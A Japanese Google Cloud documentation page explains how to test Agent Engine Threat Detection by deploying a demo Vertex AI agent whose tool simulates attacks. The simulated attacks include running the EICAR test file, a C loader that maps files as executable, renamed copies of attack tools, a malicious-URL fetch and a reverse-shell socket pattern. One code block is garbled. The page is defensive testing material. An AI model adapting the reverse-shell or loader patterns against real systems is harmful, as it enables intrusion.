Agent Engine Threat Detection をテストする

このページでは、検出機能を意図的にトリガーして検出結果をチェックすることで、Agent Engine Threat Detection の動作を確認する方法について説明します。Agent Engine Threat Detection は、Security Command Center の組み込みサービスです。

始める前に

Vertex AI Agent Engine エージェントに対する潜在的な脅威を検出するには、Security Command Center で Agent Engine Threat Detection サービスが有効になっていることを確認します。

環境を設定する

Agent Engine Threat Detection をテストするには、悪意のあるアクティビティをシミュレートするデモ エージェントを設定します。

プロジェクトを作成してシェルを有効にする

テストに使用する Google Cloud プロジェクトを選択または作成します。

検出機能をテストするには、 Google Cloud コンソールと Cloud Shell を使用します。

  1. Google Cloud コンソールに移動します。

    Google Cloud コンソールに移動

  2. テストに使用するプロジェクトを選択します。

  3. Cloud Shell をアクティブにする をクリックします。

ローカルシェルからテスト手順を実行することもできます。

Vertex AI Agent Engine を設定する

このプロジェクトで Vertex AI Agent Engine を使用したことがない場合は、開始する前に Vertex AI Agent Engine 環境を設定します。作成した Cloud Storage ステージング バケットの名前を記録します。また、Vertex AI Agent Engine のクイックスタートに沿って、Vertex AI SDK を使用してエージェントを開発し、デプロイする方法を学習することをおすすめします。

テスト スクリプトを作成する

テスト用の新しいエージェントのデプロイに使用するファイルをいくつか作成します。この作業には、nano などのテキスト エディタを使用します。

  1. 次の内容のファイルを requirements.txt という名前で新規に作成します。

    google-cloud-aiplatform[agent_engines]
    google-adk
    google-genai
    aiohttp
    cloudpickle
    pydantic
    
  2. installation_scripts/install.sh という名前の新しい空のファイルを作成します。一部のテストでは、このファイルにコンテンツを追加する必要があります。

  3. 次の内容の新しいファイルを main.py という名前で作成します。PROJECT_IDLOCATIONSTAGING_BUCKET の各変数を置き換えます。ステージング バケット名には接頭辞 gs:// を含める必要があります。

    import asyncio
    import os
    import subprocess
    import socket
    import vertexai
    from vertexai import Client, agent_engines
    from google.adk.agents import llm_agent
    from google.adk.sessions.in_memory_session_service import InMemorySessionService
    
    # Replace with your own project, location, and staging bucket.
    LOCATION = "LOCATION"
    PROJECT_ID = "PROJECT_ID"
    # Staging bucket must have gs:// prefix
    STAGING_BUCKET = "STAGING_BUCKET"
    
    client = Client(project=PROJECT_ID, location=LOCATION)
    
    def _run_command(args, **kwargs):
      output = f"Called {' '.join(args)}\n"
      try:
        res = subprocess.run(args, capture_output=True, text=True, **kwargs)
        if res.stdout:
          output += f"Result: {res.stdout.strip()}\n"
        if res.stderr:
          output += f"Error: {res.stderr.strip()}\n"
      except subprocess.TimeoutExpired:
        output += "Command timed out as expected."
      return output
    
    # Tool to simulate threats. The function body will be replaced for individual
    # detector tests.
    def threat_detection_test():
      output = _run_command(["sleep", "60"])
      output += _run_command(["echo", "this is a fake threat"])
      output += _run_command(["sleep", "10"])
      return output
    
    root_agent = llm_agent.Agent(
        model="gemini-2.5-flash",
        name="threat_detection_test_agent",
        description="Runs threat detection test.",
        instruction="""
          You are an agent that runs a threat detection test using a fake malicious
          command.
        """,
        tools=[threat_detection_test],
    )
    
    async def main():
      vertexai.init(
        project=PROJECT_ID,
        location=LOCATION,
        staging_bucket=STAGING_BUCKET,
      )
      app = agent_engines.AdkApp(
          agent=root_agent, session_service_builder=InMemorySessionService
      )
      remote_agent = client.agent_engines.create(
          agent=app,
          config={
              "display_name": "scc_threat_test_agent",
              "identity_type": vertexai.types.IdentityType.AGENT_IDENTITY,
              "requirements": [
                  "google-cloud-aiplatform[agent_engines,adk]",
                  "cloudpickle",
                  "pydantic",
              ],
              "staging_bucket": STAGING_BUCKET,
              "extra_packages": [
                  "installation_scripts/install.sh",
              ],
          },
      )
      print("Deployed agent: ", remote_agent.api_resource.name)
    
      try:
          async for event in remote_agent.async_stream_query(
              user_id="threat_detection_tester",
              message="Run the threat detection test",
          ):
            print(event)
      finally:
          client.agent_engines.delete(name=remote_agent.api_resource.name, force=True)
    
    if __name__ == "__main__":
      asyncio.run(main())
    

仮想環境を設定する

  1. Python 仮想環境を作成してアクティブにします。

      python3 -m venv env
      source env/bin/activate
    
  2. 必要な依存関係を仮想環境にインストールします。

    pip install -r requirements.txt
    

スクリプトをテストする

仮想環境内で python3 main.py を使用してスクリプトを実行します。このコマンドは、テスト エージェントのビルド、デプロイ、実行に数分かかります。

スクリプトは、デプロイされたエージェントのリソース名と、LLM レスポンスなどのメタデータを含むいくつかの JSON オブジェクトを出力します。この段階で権限エラーまたはデプロイ エラーが発生した場合は、トラブルシューティングで次の手順を確認してください。

検出項目をテストする

Agent Engine Threat Detection 検出機能 をテストするには、threat_detection_test 関数のコードを攻撃をシミュレートするコードに置き換えます。スクリプトのデプロイとエージェントのクエリに時間がかかることがあります。テストを高速化するには、これらの関数の内容をいくつかまとめてもかまいません。

実行: 追加された悪意のあるバイナリの実行

テスト スクリプトの threat_detection_test 関数を置き換えて、テスト スクリプトを実行します。

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
  output += _run_command(["touch", "/tmp/test_mal_file"])
  with open("/tmp/test_mal_file", "w") as f:
    f.write(eicar)
  output += _run_command(["chmod", "700", "/tmp/test_mal_file"])
  output += _run_command(["sh", "-c", "/tmp/test_mal_file"])
  output += _run_command(["sleep", "10"])
  return output

実行: 追加された悪意のあるライブラリの読み込み

テスト スクリプトの threat_detection_test 関数を置き換えて、テスト スクリプトを実行します。Vertex AI SDK からレスポンスの解析に関するエラーが返されることがありますが、検出結果は生成されます。

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
  with open("/tmp/test_mal_lib", "w") as f:
    f.write(eicar)
  with open("/tmp/loader.c", "w") as f:
    f.write("""
      #include <fcntl.h>
      #include <sys/mman.h>
      #include <sys/stat.h>
      #include <unistd.h>
      #include <stdlib.h>
      int main(int argc, char *argv[]) {
         int fd = open(argv[1], O_RDONLY);
         struct stat sb;
         fstat(fd, &sb);
         void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
         write(1, addr, sb.st_size);
         munmap(addr, sb.st_size);
         close(fd);
         return 0;
      }
    """)
  output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
  output += _run_command(["/tmp/loader", "/tmp/test_mal_lib"])
  output += _run_command(["sleep", "10"])
  return output

実行: コンテナ エスケープ

テスト スクリプトの threat_detection_test 関数を置き換えて、テスト スクリプトを実行します。

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  output += _run_command(["cp", "/bin/ls", "/tmp/botb-linux-amd64"])
  output += _run_command(["chmod", "700", "/tmp/botb-linux-amd64"])
  output += _run_command(["/tmp/botb-linux-amd64", "-autopwn"])
  output += _run_command(["sleep", "10"])
  return output

実行: Kubernetes 攻撃ツールの実行

テスト スクリプトの threat_detection_test 関数を置き換えて、テスト スクリプトを実行します。

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  output += _run_command(["cp", "/bin/ls", "/tmp/amicontained"])
  output += _run_command(["/tmp/amicontained"])
  output += _run_command(["sleep", "10"])
  return output

実行: ローカル偵察ツールの実行

テスト スクリプトの threat_detection_test 関数を置き換えて、テスト スクリプトを実行します。

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  output += _run_command(["cp", "/bin/ls", "/tmp/linenum.sh"])
  output += _run_command(["/tmp/linenum.sh"])
  output += _run_command(["sleep", "10"])
  return output

実行: 変更された悪意のあるバイナリの実行

Replace the `threat_detection_test` function in the test script, and then run the
test script.

```python
def threat_detection_test():
    eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
    output = _run_command(["sleep", "60"])
    output += _run_command(["chmod", "-R", "777", "/code"])
    with open("/code/entrypoint.sh", "w") as f:
f.write(eicar)

output += _run_command(["chmod", "700", "/code/entrypoint.sh"]) output += _run_command(["sh", "-c", "/code/entrypoint.sh"]) output += _run_command(["sleep", "10"]) return output ```

実行: 変更された悪意のあるライブラリの読み込み

テスト スクリプトの threat_detection_test 関数を置き換えて、テスト スクリプトを実行します。

def threat_detection_test():
  eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
  output = _run_command(["sleep", "60"])
  output += _run_command(["chmod", "-R", "777", "/code"])
  with open("/code/entrypoint.sh", "w") as f:
    f.write(eicar)
  with open("/tmp/loader.c", "w") as f:
    f.write("""
      #include <fcntl.h>
      #include <sys/mman.h>
      #include <sys/stat.h>
      #include <unistd.h>
      #include <stdlib.h>
      int main(int argc, char *argv[]) {
         int fd = open(argv[1], O_RDONLY);
         struct stat sb;
         fstat(fd, &sb);
         void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
         write(1, addr, sb.st_size);
         munmap(addr, sb.st_size);
         close(fd);
         return 0;
      }
    """)
  output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
  output += _run_command(["/tmp/loader", "/code/entrypoint.sh"])
  output += _run_command(["sleep", "10"])
  return output

悪意のある URL の観測

installation_scripts/install.sh ファイルを次の内容で更新します。

#!/bin/bash
apt-get install -y curl --no-install-recommends

テスト スクリプトの threat_detection_test 関数を置き換えて、テスト スクリプトを実行します。

def threat_detection_test():
  url = "https://testsafebrowsing.appspot.com/s/malware.html"
  output = _run_command(["sleep", "60"])
  output += _run_command(["curl", url])
  output += _run_command(["sleep", "10"])
  return output

リバースシェル

テスト スクリプトの threat_detection_test 関数を置き換えて、テスト スクリプトを実行します。

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  output += _run_command(["cp", "/bin/echo", "/tmp/sh"])
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect(("8.8.8.8", 53))
  subprocess.run(["/tmp/sh"], stdin=s, stdout=s, stderr=s, timeout=5)
  output += _run_command(["sleep", "10"])
  return output

次のステップ